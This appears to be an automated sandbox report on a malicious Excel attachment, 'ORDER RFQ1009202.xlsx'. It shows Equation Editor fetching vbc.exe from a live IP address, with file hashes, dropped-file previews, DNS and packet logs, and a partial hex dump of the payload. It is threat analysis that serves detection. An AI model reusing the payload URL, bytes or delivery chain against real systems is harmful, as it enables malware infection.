SSDEEP:	1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
MD5:	208FD40D2F72D9AED77A86A44782E9E2
SHA1:	216B99E777ED782BDC3BFD1075DB90DFDDABD20F
SHA-256:	CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
SHA-512:	7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
Malicious:	false
Preview:	.PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u\|0a.....].R.z...2......GJY\|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..\|...=.\|K...w...}O..{\|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..\|j.....b.r7.O!F...c'......$...)....\|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}\|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq\|.0...e.v......17...:F

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D9A7A0EA.png Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PNG image data, 476 x 244, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	49744
Entropy (8bit):	7.99056926749243
Encrypted:	true
SSDEEP:	768:wnuJ6p14x3egT1LYye1wBiPaaBsZbkCev17dGOhRkJjsv+gZB/UcVaxZJ2LEz:Yfp1UeWNYF1UiPm+/q1sxZB/ZS
MD5:	63A6CB15B2B8ECD64F1158F5C8FBDCC8
SHA1:	8783B949B93383C2A5AF7369C6EEB9D5DD7A56F6
SHA-256:	AEA49B54BA0E46F19E04BB883DA311518AF3711132E39D3AF143833920CDD232
SHA-512:	BB42A40E6EADF558C2AAE82F5FB60B8D3AC06E669F41B46FCBE65028F02B2E63491DB40E1C6F1B21A830E72EE52586B83A24A055A06C2CCC2D1207C2D5AD6B45
Malicious:	false
Preview:	.PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..\|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$.......kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........\|i ..."....V.g.\.G..p..p.X[.....%hyt...@..J...~.p.....\|..>...~.`..E_....iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w..y..\|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.\|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DF40A54.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 191x263, frames 3
Category:	dropped
Size (bytes):	8815
Entropy (8bit):	7.944898651451431
Encrypted:	false
SSDEEP:	192:Qjnr2Il8e7li2YRD5x5dlyuaQ0ugZIBn+0O2yHQGYtPto:QZl8e7li2YdRyuZ0b+JGgtPW
MD5:	F06432656347B7042C803FE58F4043E1
SHA1:	4BD52B10B24EADECA4B227969170C1D06626A639
SHA-256:	409F06FC20F252C724072A88626CB29F299167EAE6655D81DF8E9084E62D6CF6
SHA-512:	358FEB8CBFFBE6329F31959F0F03C079CF95B494D3C76CF3669D28CA8CDB42B04307AE46CED1FC0605DEF31D9839A0283B43AA5D409ADC283A1CAD787BE95F0E
Malicious:	false
Preview:	......JFIF...................................................) ..(...!1!%)-.....383,7(..,...........+...7++++-+++++++++++++++---++++++++-+++++++++++++++++...........".......................................F........................!."1A..QRa.#2BSq......3b.....$c....C...Er.5.........................................................?..x.5.PM.Q@E..I......i..0.$G.C...h..Gt....f..O..U..D.t^...u.B...V9.f..<..t(.kt...d.@...&3)d@@?.q...t..3!.... .9.r.....Q.(:.W..X&..&.1&T..K..\|kc.....[..l.3(f+.c...:+....5....hHR.0....^R.G..6...&pB..d.h.04.+..S...M........[....'......J...,...<.O.........Yn...T.!..E*G.[I..-.......$e&........z..[..3.+~..a.u9d.&9K.xkX'.."...Y...l.......MxPu..b..:0e:.R.#.......U....E...4Pd/..0.`.4 ...A...t.....2....gb[)b.I."&..y1..........l.s>.ZA?..........3... z^....L.n6..Am.1m....0../..~.y......1.b.0U...5.oi.\.LH1.f....sl................f.'3?...bu.P4>...+..B....eL....R.,...<....3.0O$,=..K.!....Z.......O.I.z....am....C.k..iZ ...<ds....f8f..R....K

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F3B5FE45.jpeg Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 333x151, frames 3
Category:	dropped
Size (bytes):	14198
Entropy (8bit):	7.916688725116637
Encrypted:	false
SSDEEP:	384:lboF1PuTfwKCNtwsU9SjUB7ShYIv7JrEHaeHj7KHG81I:lboFgwK+wD9SA7ShX7JrEL7KHG8S
MD5:	E8FC908D33C78AAAD1D06E865FC9F9B0
SHA1:	72CA86D260330FC32246D28349C07933E427065D
SHA-256:	7BB11564F3C6C559B3AC8ADE3E5FCA1D51F5451AFF5C522D70C3BACEC0BBB5D0
SHA-512:	A005677A2958E533A51A95465308F94BE173F93264A2A3DB58683346CA97E04F14567D53D0066C1EAA33708579CD48B8CD3F02E1C54F126B7F3C4E64AC196E17
Malicious:	false
Preview:	......JFIF.................................... .... !....!..!) ..&.".#1!&)+... "383-7(-.-...........-...------0--------+-------------------+--------------........M..".......................................E......................!...1A"Q.aq..2B..#R..3b...$r..C......4DSTcs..................................................Q.A............?...f.t..Q ]....i".G.2....}....m..D..."......Z.5..5...CPL..W..o7....h.u..+.B...R.S.I. ..m...8.T...(.YX.St.@r..ca...\|5.2.....%..R.A67.........{....X.;...4.D.o'..R...sV8....rJm....2Est-.......U.@......\|j.4.mn..Ke!G.6PJ.S>..0....q%..... .....@...T.P.<...q.z.e....((H+. ..@$...'..?..h.P.]...ZP.H..l?s2l.$.N..?xP..c...@....A..D.l......1...[q[5(-.J..@...$..N....x.U.fHY!..PM..[.P........aY.....S.R.....Y...(D.\|..10........... ..l..\|F...E9...RU:.P...p$.'......2.s.-....a&.@..P.....m..........L.a.H;Dv)...@u...s.,.h..6..Y,....D.7....,.UHe.s..PQ.Ym....)..(y.6.u...i.V.'2`....&.... ^...8.+]K)R...\.'A...I..B..?[.:.L(c3J..%..$.3..E0@...."5fj...

C:\Users\user\Desktop\~$ORDER RFQ1009202.xlsx Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	330
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:	96114D75E30EBD26B572C1FC83D1D02E
SHA1:	A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:	52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	6.0734640463696286
Encrypted:	false
SSDEEP:	1536:YoWKN83Xv+cALoeaAVFyj6Jr7MX0LzxIKt5M/NPpIsx:tWYIXmcA8FAu2JEXEtItI
MD5:	4399C694E88F3F32D22D91C6C4A173ED
SHA1:	FA50DF0581C5591073C6C48D5DFCF575FA272198
SHA-256:	90FDCC08F9912AB5FA918A6CAAB5E23D76BA61A869C533EA507E1CCD81A7DD00
SHA-512:	EBAE4C3A8367F40B1742E7F0A62757AD37C802413C6C274C094520EBD580B475368D812AAE38B881C717BFE03C0AEE9088658D80D0DE4AA02BD9475065BD2260
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 28%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......H.....................0......\.............@..........................0..............................................4...(.... ......................................................................(... .......,............................text............................... ..`.data...............................@....rsrc........ ......................@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	CDFV2 Encrypted
Entropy (8bit):	7.98841165708155
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	ORDER RFQ1009202.xlsx
File size:	601912
MD5:	f60722f1276c17d3730a51d325e38e4f
SHA1:	db5bff43471b8729d3da739d85d156f586fd4ece
SHA256:	065e796cb07c1408bca1859b5ca5fae93d8bd6d145e0a547b9916f226c6d7fa8
SHA512:	15b3683e6193b8abd337168b3847af917308950490b0344a80e6e019d4d116d639741596e5290657b94f78189706f758716143c0918c34377dc1aa2ec661cd68
SSDEEP:	12288:gbIq1V9JJV8sfKZa5Sg3bAawvGRiZ/woMWGY4TS2ZnD:KIEKs46H3bArGRiq64D
File Content Preview:	........................>.......................................................................................{..............................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 14, 2021 12:17:17.343616009 CEST	49165	443	192.168.2.22	151.101.65.195
Sep 14, 2021 12:17:17.343656063 CEST	443	49165	151.101.65.195	192.168.2.22
Sep 14, 2021 12:17:17.343720913 CEST	49165	443	192.168.2.22	151.101.65.195
Sep 14, 2021 12:17:17.354707003 CEST	49165	443	192.168.2.22	151.101.65.195
Sep 14, 2021 12:17:17.354732990 CEST	443	49165	151.101.65.195	192.168.2.22
Sep 14, 2021 12:17:17.419389009 CEST	443	49165	151.101.65.195	192.168.2.22
Sep 14, 2021 12:17:17.419579029 CEST	49165	443	192.168.2.22	151.101.65.195
Sep 14, 2021 12:17:17.420301914 CEST	443	49165	151.101.65.195	192.168.2.22
Sep 14, 2021 12:17:17.420433998 CEST	49165	443	192.168.2.22	151.101.65.195
Sep 14, 2021 12:17:17.434212923 CEST	49165	443	192.168.2.22	151.101.65.195
Sep 14, 2021 12:17:17.434237003 CEST	443	49165	151.101.65.195	192.168.2.22
Sep 14, 2021 12:17:17.434743881 CEST	443	49165	151.101.65.195	192.168.2.22
Sep 14, 2021 12:17:17.434842110 CEST	49165	443	192.168.2.22	151.101.65.195
Sep 14, 2021 12:17:17.686927080 CEST	49165	443	192.168.2.22	151.101.65.195
Sep 14, 2021 12:17:17.731153011 CEST	443	49165	151.101.65.195	192.168.2.22
Sep 14, 2021 12:17:18.047235966 CEST	443	49165	151.101.65.195	192.168.2.22
Sep 14, 2021 12:17:18.047524929 CEST	49165	443	192.168.2.22	151.101.65.195
Sep 14, 2021 12:17:18.047553062 CEST	443	49165	151.101.65.195	192.168.2.22
Sep 14, 2021 12:17:18.047609091 CEST	49165	443	192.168.2.22	151.101.65.195
Sep 14, 2021 12:17:18.052607059 CEST	49165	443	192.168.2.22	151.101.65.195
Sep 14, 2021 12:17:18.052747011 CEST	443	49165	151.101.65.195	192.168.2.22
Sep 14, 2021 12:17:18.052823067 CEST	49165	443	192.168.2.22	151.101.65.195
Sep 14, 2021 12:17:18.080698013 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.191730022 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.191977978 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.192605972 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.309433937 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.309463978 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.309477091 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.309489012 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.309660912 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.421314955 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.421351910 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.421369076 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.421391010 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.421411991 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.421433926 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.421457052 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.421478033 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.421526909 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.421560049 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.535042048 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535078049 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535103083 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535109043 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.535150051 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.535152912 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.535161018 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535186052 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535202980 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535218954 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535229921 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.535232067 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535244942 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535257101 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535269022 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535281897 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535299063 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535321951 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535340071 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.535362959 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.535387993 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.537224054 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.646368980 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646428108 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646467924 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646507025 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.646508932 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646537066 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.646548033 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.646549940 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646600008 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646644115 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646646023 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.646682978 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646722078 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646727085 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.646763086 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646800041 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646806002 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.646838903 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.646838903 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646878004 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646919966 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.646924973 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.646967888 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.647006989 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.647008896 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.647046089 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.647083998 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.647088051 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.647157907 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.647209883 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.647213936 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.647255898 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.647264957 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.647294044 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.647341967 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.647342920 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.647387028 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.647424936 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.647437096 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.647464991 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.647509098 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.648535013 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.759126902 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.759185076 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.759223938 CEST	80	49166	23.95.85.181	192.168.2.22
Sep 14, 2021 12:17:18.759294033 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:18.759339094 CEST	49166	80	192.168.2.22	23.95.85.181
Sep 14, 2021 12:17:20.298302889 CEST	49166	80	192.168.2.22	23.95.85.181

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 14, 2021 12:17:17.274439096 CEST	52167	53	192.168.2.22	8.8.8.8
Sep 14, 2021 12:17:17.321638107 CEST	53	52167	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Sep 14, 2021 12:17:17.274439096 CEST	192.168.2.22	8.8.8.8	0x267c	Standard query (0)	ggle.io	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Sep 14, 2021 12:17:17.321638107 CEST	8.8.8.8	192.168.2.22	0x267c	No error (0)	ggle.io		151.101.65.195	A (IP address)	IN (0x0001)
Sep 14, 2021 12:17:17.321638107 CEST	8.8.8.8	192.168.2.22	0x267c	No error (0)	ggle.io		151.101.1.195	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

ggle.io

23.95.85.181

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	151.101.65.195	443	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	23.95.85.181	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Sep 14, 2021 12:17:18.192605972 CEST	8	OUT	GET /msn/vbc.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Connection: Keep-Alive Host: 23.95.85.181
Sep 14, 2021 12:17:18.309433937 CEST	10	IN	HTTP/1.1 200 OK Date: Tue, 14 Sep 2021 17:17:17 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 Last-Modified: Tue, 14 Sep 2021 02:46:53 GMT ETag: "12000-5cbeb98214636" Accept-Ranges: bytes Content-Length: 73728 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdownload Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8b 23 c4 db cf 42 aa 88 cf 42 aa 88 cf 42 aa 88 4c 5e a4 88 ce 42 aa 88 80 60 a3 88 cd 42 aa 88 f9 64 a7 88 ce 42 aa 88 52 69 63 68 cf 42 aa 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 e0 86 d4 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 f0 00 00 00 30 00 00 00 00 00 00 5c 13 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 01 00 00 10 00 00 01 ee 01 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 ee 00 00 28 00 00 00 00 20 01 00 f5 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 2c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 e3 00 00 00 10 00 00 00 f0 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c4 11 00 00 00 00 01 00 00 10 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f5 09 00 00 00 20 01 00 00 10 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$#BBBL^B`BdBRichBPELH0\@04( ( ,.text `.data@.rsrc @@IMSVBVM60.DLL
Sep 14, 2021 12:17:18.309463978 CEST	11	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 14, 2021 12:17:18.309477091 CEST	12	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 14, 2021 12:17:18.309489012 CEST	14	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Sep 14, 2021 12:17:18.421314955 CEST	15	IN	Data Raw: 6e 74 00 00 00 00 00 00 00 00 00 00 00 ff cc 31 00 0c 2c 02 0a 91 a0 f7 cb 40 99 5a f2 69 ad 87 05 07 83 13 31 b3 6a 52 1a 4d 8b 97 1b 83 97 51 3f 69 3a 4f ad 33 99 66 cf 11 b7 0c 00 aa 00 60 d3 93 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: nt1,@Zi1jRMQ?i:O3f`ZvaskemaskinefaTemposkiftenes9B"$Temposkiftenes95DFDir1<;.Label3B
